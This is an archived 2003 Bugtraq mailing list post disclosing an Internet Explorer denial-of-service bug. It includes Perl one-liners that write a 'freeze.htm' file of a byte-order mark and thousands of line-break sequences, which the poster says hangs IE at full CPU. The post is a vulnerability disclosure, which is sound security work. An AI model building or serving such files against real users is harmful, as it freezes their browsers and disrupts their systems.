Home page logo

bugtraq logo Bugtraq mailing list archives

Re: April appeared to be a month of IE bugs. Here's another one.
From: "ERRor" <error () pochtamt ru>
Date: Thu, 1 May 2003 05:26:34 +0400

Hello, Bugtraq.

Malicious htm file can freeze IE with 100% CPU usage:
Construct the file freeze.htm:
c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm

 This string works only with Active Perl, in unix-like Perl versions exploit
string is:
 perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm
 Active Perl understand \n = \x0D\x0A, freeze of  IE exist only if sequence
 of bytes will be ...\x0D\x0D\x0A...
 Sorry, I have not noticed it at once.

 Best Regards, ERRor, dHtm.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]